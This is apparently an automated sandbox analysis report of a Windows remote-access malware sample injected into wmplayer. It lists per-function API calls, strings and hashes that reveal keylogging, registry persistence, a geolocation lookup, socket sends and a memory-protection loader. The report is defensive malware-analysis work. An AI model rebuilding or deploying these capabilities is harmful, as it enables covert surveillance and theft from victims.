                                                                                            control_flow_graph 1556 40c89e-40c8c3 call 401e52 1559 40c8c9 1556->1559 1560 40c9ed-40ca85 call 401e07 GetLongPathNameW call 403b40 * 2 call 40cc37 call 402860 * 2 call 401e13 * 5 1556->1560 1561 40c8d0-40c8d5 1559->1561 1562 40c9c2-40c9c7 1559->1562 1563 40c905-40c90a 1559->1563 1564 40c9d8 1559->1564 1565 40c9c9-40c9ce call 43ac0f 1559->1565 1566 40c8da-40c8e8 call 41a74b call 401e18 1559->1566 1567 40c8fb-40c900 1559->1567 1568 40c9bb-40c9c0 1559->1568 1569 40c90f-40c916 call 41b15b 1559->1569 1572 40c9dd-40c9e2 call 43ac0f 1561->1572 1562->1572 1563->1572 1564->1572 1576 40c9d3-40c9d6 1565->1576 1588 40c8ed 1566->1588 1567->1572 1568->1572 1585 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1569->1585 1586 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1569->1586 1581 40c9e3-40c9e8 call 4082d7 1572->1581 1576->1564 1576->1581 1581->1560 1594 40c8f1-40c8f6 call 401e13 1585->1594 1586->1588 1588->1594 1594->1560
                                                                                            APIs
                                                                                            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LongNamePath
                                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                            • API String ID: 82841172-425784914
                                                                                            • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                            • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                            • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                            • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                            Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                            Strings
                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                            • API String ID: 3121278467-91888290
                                                                                            • Opcode ID: 08bf1114c47a89f5108f7250f1a6636181e558f0e019b3e6eb8e3cc4f37dd347
                                                                                            • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                            • Opcode Fuzzy Hash: 08bf1114c47a89f5108f7250f1a6636181e558f0e019b3e6eb8e3cc4f37dd347
                                                                                            • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                            Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                              • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                            • API String ID: 782494840-2070987746
                                                                                            • Opcode ID: c99cda145aab75313da119a94411f5e202358f5817e57e5ec0b18c18d1186637
                                                                                            • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                            • Opcode Fuzzy Hash: c99cda145aab75313da119a94411f5e202358f5817e57e5ec0b18c18d1186637
                                                                                            • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                            Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                              • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2099061454-0
                                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                            • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                            • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                            Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                            • String ID: `AG
                                                                                            • API String ID: 1958988193-3058481221
                                                                                            • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                            • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                            Function 004126D2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                            • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValue
                                                                                            • String ID: HgF$pth_unenc
                                                                                            • API String ID: 1818849710-3662775637
                                                                                            • Opcode ID: ce1b1880fa86f9afcc584a6235dbd77663573278f484025842f99512ca6562dc
                                                                                            • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                            • Opcode Fuzzy Hash: ce1b1880fa86f9afcc584a6235dbd77663573278f484025842f99512ca6562dc
                                                                                            • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                            Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                              • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                              • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2099061454-0
                                                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                            • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                            • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                            Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 2152742572-0
                                                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                            • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                            • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                            Function 00404468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92synchronizationnetworkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                            • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EventObjectSingleWaitsend
                                                                                            • String ID: LAL
                                                                                            • API String ID: 3963590051-3302426157
                                                                                            • Opcode ID: 8e3ac4017b7938842f7bdadaab4273c60c1aff030dea0fb14339be44d5f19cec
                                                                                            • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                            • Opcode Fuzzy Hash: 8e3ac4017b7938842f7bdadaab4273c60c1aff030dea0fb14339be44d5f19cec
                                                                                            • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                            Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread$LocalTimewsprintf
                                                                                            • String ID: Offline Keylogger Started
                                                                                            • API String ID: 465354869-4114347211
                                                                                            • Opcode ID: b3c31ab8b9b3ed7652650e24222149608630b0603d760ccce190acea4dbe7940
                                                                                            • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                            • Opcode Fuzzy Hash: b3c31ab8b9b3ed7652650e24222149608630b0603d760ccce190acea4dbe7940
                                                                                            • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                            Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                            • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValue
                                                                                            • String ID: TUF
                                                                                            • API String ID: 1818849710-3431404234
                                                                                            • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                            • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                            • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                            • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                            Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 3360349984-0
                                                                                            • Opcode ID: 3baf678481d723c328b00f7ce024446a417703099d7e8fad4d5c257ac9859cfe
                                                                                            • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                            • Opcode Fuzzy Hash: 3baf678481d723c328b00f7ce024446a417703099d7e8fad4d5c257ac9859cfe
                                                                                            • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                            Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                            • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3604237281-0
                                                                                            • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                            • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                            • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                            • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                            Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                            • String ID:
                                                                                            • API String ID: 3919263394-0
                                                                                            • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                            • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                            • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                            • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                            Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CountEventTick
                                                                                            • String ID: >G
                                                                                            • API String ID: 180926312-1296849874
                                                                                            • Opcode ID: 0d957b7f474a9c2dd2e740429bb0f2e71e139f82723a5568239a384ede3f3f6d
                                                                                            • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                            • Opcode Fuzzy Hash: 0d957b7f474a9c2dd2e740429bb0f2e71e139f82723a5568239a384ede3f3f6d
                                                                                            • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                            Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                            • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastMutex
                                                                                            • String ID: Rmc-MKYDDH
                                                                                            • API String ID: 1925916568-2989027721
                                                                                            • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                            • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                            • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                            • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
